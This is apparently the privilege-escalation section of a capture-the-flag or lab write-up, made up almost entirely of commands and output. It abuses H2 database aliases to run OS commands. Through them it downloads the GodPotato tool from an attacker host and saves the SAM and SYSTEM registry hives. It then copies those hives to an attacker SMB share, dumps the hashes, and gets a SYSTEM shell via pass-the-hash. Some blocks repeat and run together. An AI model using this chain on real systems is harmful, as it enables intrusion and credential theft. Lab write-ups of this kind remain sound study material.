Priv Esc
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami /priv").getInputStream()).useDelimiter("\\Z").next()');
Last updated
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami /priv").getInputStream()).useDelimiter("\\Z").next()');Last updated
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("curl 192.168.45.233/GodPotato-NET4.exe -o C:\\programdata\\GodPotato-NET4.exe").getInputStream()).useDelimiter("\\Z").next()');CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"reg.exe save HKLM\\SAM C:\\programdata\\sam.bak\" ").getInputStream()).useDelimiter("\\Z").next()');CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"reg.exe save HKLM\\SYSTEM C:\\programdata\\system.bak\" ").getInputStream()).useDelimiter("\\Z").next()');$ impacket-smbserver share share/ -smb2supportCREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("net use \\\\192.168.45.233\\share").getInputStream()).useDelimiter("\\Z").next()');CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"cmd /c copy C:\\programdata\\system.bak \\\\192.168.45.233\\share\" ").getInputStream()).useDelimiter("\\Z").next()'); CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"cmd /c copy C:\\programdata\\sam.bak \\\\192.168.45.233\\share\" ").getInputStream()).useDelimiter("\\Z").next()'); $ impacket-secretsdump -sam sam.bak -system system.bak local$ impacket-psexec [email protected] -hashes :63f4402373a85ea2606ebbe11d871d27
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.241.66.....
[*] Found writable share ADMIN$
[*] Uploading file inNgTHUe.exe
[*] Opening SVCManager on 192.168.241.66.....
[*] Creating service SZvD on 192.168.241.66.....
[*] Starting service SZvD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
9c14b341d21d5489d6ef0f16c1bf51e3
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.241.66
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.241.254